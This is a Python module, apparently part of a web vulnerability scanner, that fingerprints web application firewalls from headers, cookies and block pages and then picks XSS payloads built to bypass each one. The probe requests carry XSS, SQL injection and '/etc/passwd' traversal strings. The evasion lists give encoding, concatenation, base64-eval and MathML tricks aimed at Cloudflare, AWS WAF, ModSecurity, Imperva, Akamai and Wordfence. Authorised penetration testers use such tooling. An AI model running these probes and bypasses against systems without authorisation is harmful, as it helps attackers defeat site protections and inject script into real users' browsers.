"""
WAF (Web Application Firewall) Detection & Bypass Module
Detects common WAFs by analyzing response headers and behavior,
then selects appropriate evasion payloads.
"""

import re
import requests
from typing import Dict, List, Tuple, Optional
from colorama import Fore, Style


# WAF signatures: (name, header_patterns, body_patterns)
WAF_SIGNATURES = [
    {
        'name': 'Cloudflare',
        'headers': {'server': r'cloudflare', 'cf-ray': r'.+'},
        'body': [r'attention required.*cloudflare', r'cf-error-details'],
        'cookies': ['__cfduid', 'cf_clearance']
    },
    {
        'name': 'AWS WAF',
        'headers': {'x-amzn-requestid': r'.+'},
        'body': [r'<html>.*403 forbidden.*</html>'],
        'cookies': ['awsalb', 'awsalbcors']
    },
    {
        'name': 'ModSecurity',
        'headers': {'server': r'mod_security|modsecurity'},
        'body': [r'mod_security', r'modsecurity', r'not acceptable.*406'],
        'cookies': []
    },
    {
        'name': 'Akamai',
        'headers': {'server': r'akamaighost', 'x-akamai-transformed': r'.+'},
        'body': [r'access denied.*akamai', r'reference.*#\d+\.\w+'],
        'cookies': ['akamai']
    },
    {
        'name': 'Sucuri',
        'headers': {'server': r'sucuri', 'x-sucuri-id': r'.+'},
        'body': [r'sucuri website firewall', r'access denied.*sucuri'],
        'cookies': ['sucuri_cloudproxy']
    },
    {
        'name': 'Imperva/Incapsula',
        'headers': {'x-iinfo': r'.+', 'x-cdn': r'incapsula'},
        'body': [r'incapsula incident', r'_incapsula_resource'],
        'cookies': ['incap_ses', 'visid_incap']
    },
    {
        'name': 'F5 BIG-IP ASM',
        'headers': {'server': r'bigip', 'x-wa-info': r'.+'},
        'body': [r'the requested url was rejected', r'support id'],
        'cookies': ['TS', 'BIGipServer']
    },
    {
        'name': 'Barracuda',
        'headers': {'server': r'barracuda'},
        'body': [r'barracuda.*web application firewall'],
        'cookies': ['barra_counter_session']
    },
    {
        'name': 'Wordfence',
        'headers': {},
        'body': [r'wordfence', r'generated by wordfence', r'wfvt_\d+'],
        'cookies': ['wfvt_']
    },
    {
        'name': 'Fortinet FortiWeb',
        'headers': {'server': r'fortiweb'},
        'body': [r'fortigate', r'fortiweb'],
        'cookies': ['FORTIWAFSID']
    },
    {
        'name': 'DenyAll',
        'headers': {'server': r'denyall'},
        'body': [r'conditionblocked', r'denyall'],
        'cookies': ['sessioncookie']
    },
    {
        'name': 'Comodo WAF',
        'headers': {'server': r'protected by anti-ddos'},
        'body': [r'protected by comodo'],
        'cookies': []
    },
]


class WAFDetector:
    """Detects and identifies Web Application Firewalls"""

    def __init__(self, session: requests.Session, config):
        self.session = session
        self.config = config
        self.detected_waf: Optional[str] = None
        self.waf_confidence: float = 0.0

    def detect(self, target_url: str) -> Dict:
        """
        Detect WAF on target by sending benign and malicious requests.
        Returns detection result with WAF name and confidence.
        """
        result = {
            'detected': False,
            'waf_name': None,
            'confidence': 0.0,
            'evidence': []
        }

        # Step 1: Send a normal request for baseline
        try:
            baseline = self.session.get(target_url, timeout=self.config.timeout)
        except Exception:
            return result

        # Step 2: Send a clearly malicious request to trigger WAF
        test_payloads = [
            '<script>alert(1)</script>',
            "' OR 1=1 --",
            '../../../etc/passwd',
        ]

        malicious_responses = []
        for payload in test_payloads:
            try:
                test_url = f"{target_url}?xss_test={payload}"
                resp = self.session.get(test_url, timeout=self.config.timeout)
                malicious_responses.append(resp)
            except Exception:
                continue

        # Step 3: Analyze responses for WAF signatures
        all_responses = [baseline] + malicious_responses

        for waf_sig in WAF_SIGNATURES:
            score = self._check_waf_signature(waf_sig, all_responses)
            if score > result['confidence']:
                result['detected'] = True
                result['waf_name'] = waf_sig['name']
                result['confidence'] = score

        # Step 4: Check for generic WAF indicators
        if not result['detected']:
            generic_score, evidence = self._check_generic_waf(baseline, malicious_responses)
            if generic_score > 0.5:
                result['detected'] = True
                result['waf_name'] = 'Unknown WAF'
                result['confidence'] = generic_score
                result['evidence'] = evidence

        self.detected_waf = result['waf_name']
        self.waf_confidence = result['confidence']

        return result

    def _check_waf_signature(self, signature: Dict, responses: List) -> float:
        """Check a specific WAF signature against responses"""
        score = 0.0
        checks = 0

        for resp in responses:
            # Check headers
            for header_name, pattern in signature.get('headers', {}).items():
                checks += 1
                header_value = resp.headers.get(header_name, '')
                if re.search(pattern, header_value, re.IGNORECASE):
                    score += 1.0

            # Check body patterns
            for body_pattern in signature.get('body', []):
                checks += 1
                if re.search(body_pattern, resp.text, re.IGNORECASE):
                    score += 1.0

            # Check cookies
            for cookie_name in signature.get('cookies', []):
                checks += 1
                if any(cookie_name.lower() in c.lower() for c in resp.cookies.keys()):
                    score += 1.0

        if checks == 0:
            return 0.0

        return min(score / max(checks * 0.3, 1), 1.0)

    def _check_generic_waf(self, baseline, malicious_responses: List) -> Tuple[float, List[str]]:
        """Check for generic WAF indicators"""
        evidence = []
        score = 0.0

        for resp in malicious_responses:
            # Status code differences
            if resp.status_code in [403, 406, 429, 503]:
                if baseline.status_code == 200:
                    evidence.append(f"Status {resp.status_code} on malicious request (baseline was 200)")
                    score += 0.3

            # Response size dramatically different
            if baseline.status_code == 200 and resp.status_code == 200:
                size_ratio = len(resp.text) / max(len(baseline.text), 1)
                if size_ratio < 0.3:
                    evidence.append("Response size significantly smaller for malicious request")
                    score += 0.2

            # Common block page indicators
            block_indicators = [
                'blocked', 'forbidden', 'access denied', 'not acceptable',
                'request rejected', 'security policy', 'web application firewall'
            ]
            for indicator in block_indicators:
                if indicator in resp.text.lower() and indicator not in baseline.text.lower():
                    evidence.append(f"Block indicator found: '{indicator}'")
                    score += 0.2
                    break

        return min(score, 1.0), evidence

    def get_evasion_payloads(self) -> List[Dict]:
        """Get WAF-specific evasion payloads based on detected WAF"""
        # Universal evasion techniques
        universal = [
            {'payload': '<svg/onload=alert(1)>', 'type': 'WAF Bypass - No Space', 'severity': 'High'},
            {'payload': '<img src=x onerror=alert`1`>', 'type': 'WAF Bypass - Backtick', 'severity': 'High'},
            {'payload': '<svg onload=alert&lpar;1&rpar;>', 'type': 'WAF Bypass - HTML Entity', 'severity': 'High'},
            {'payload': '<script>alert(1)//</script>', 'type': 'WAF Bypass - Comment', 'severity': 'High'},
            {'payload': '"><img src=x onerror=alert(1)//>', 'type': 'WAF Bypass - Attr Break', 'severity': 'High'},
        ]

        if not self.detected_waf:
            return universal

        waf_specific = {
            'Cloudflare': [
                {'payload': '<a/href="j%0Aavascript:alert(1)">X</a>', 'type': 'Cloudflare Bypass - Newline', 'severity': 'High'},
                {'payload': '<svg onload=&#97;&#108;&#101;&#114;&#116;(1)>', 'type': 'Cloudflare Bypass - Entities', 'severity': 'High'},
                {'payload': '<img src=x onerror="a]lert(1)">', 'type': 'Cloudflare Bypass - Bracket', 'severity': 'High'},
                {'payload': '<script>eval(atob("YWxlcnQoMSk="))</script>', 'type': 'Cloudflare Bypass - Base64', 'severity': 'High'},
            ],
            'ModSecurity': [
                {'payload': '<img src=x onerror=prompt(1)>', 'type': 'ModSec Bypass - prompt', 'severity': 'High'},
                {'payload': '<svg/onload=confirm(1)>', 'type': 'ModSec Bypass - confirm', 'severity': 'High'},
                {'payload': '<details/open/ontoggle=alert(1)>', 'type': 'ModSec Bypass - details', 'severity': 'High'},
                {'payload': '<math><mi><table><mglyph><style><img src=x onerror=alert(1)>', 'type': 'ModSec Bypass - MathML', 'severity': 'High'},
            ],
            'AWS WAF': [
                {'payload': '<img src=x onerror=window["al"+"ert"](1)>', 'type': 'AWS WAF Bypass - Concat', 'severity': 'High'},
                {'payload': '<svg onload=self["ale"+"rt"](1)>', 'type': 'AWS WAF Bypass - Self', 'severity': 'High'},
                {'payload': '<img src=x onerror=top[/al/.source+/ert/.source](1)>', 'type': 'AWS WAF Bypass - Regex', 'severity': 'High'},
            ],
            'Imperva/Incapsula': [
                {'payload': '<img src=x onerror=alert(1)//>', 'type': 'Imperva Bypass - Comment', 'severity': 'High'},
                {'payload': '<svg/onload=alert(1)>', 'type': 'Imperva Bypass - No Space', 'severity': 'High'},
                {'payload': '<marquee onstart=alert(1)>', 'type': 'Imperva Bypass - Marquee', 'severity': 'High'},
            ],
            'Akamai': [
                {'payload': '<img src=x onerror=window.alert(1)>', 'type': 'Akamai Bypass - Window', 'severity': 'High'},
                {'payload': '<svg onload=self.alert(1)>', 'type': 'Akamai Bypass - Self', 'severity': 'High'},
            ],
            'Wordfence': [
                {'payload': '<img src=x onerror=alert(1)>', 'type': 'Wordfence Bypass - Basic', 'severity': 'High'},
                {'payload': '<details open ontoggle=alert(1)>', 'type': 'Wordfence Bypass - Details', 'severity': 'High'},
            ],
        }

        specific = waf_specific.get(self.detected_waf, [])
        return universal + specific
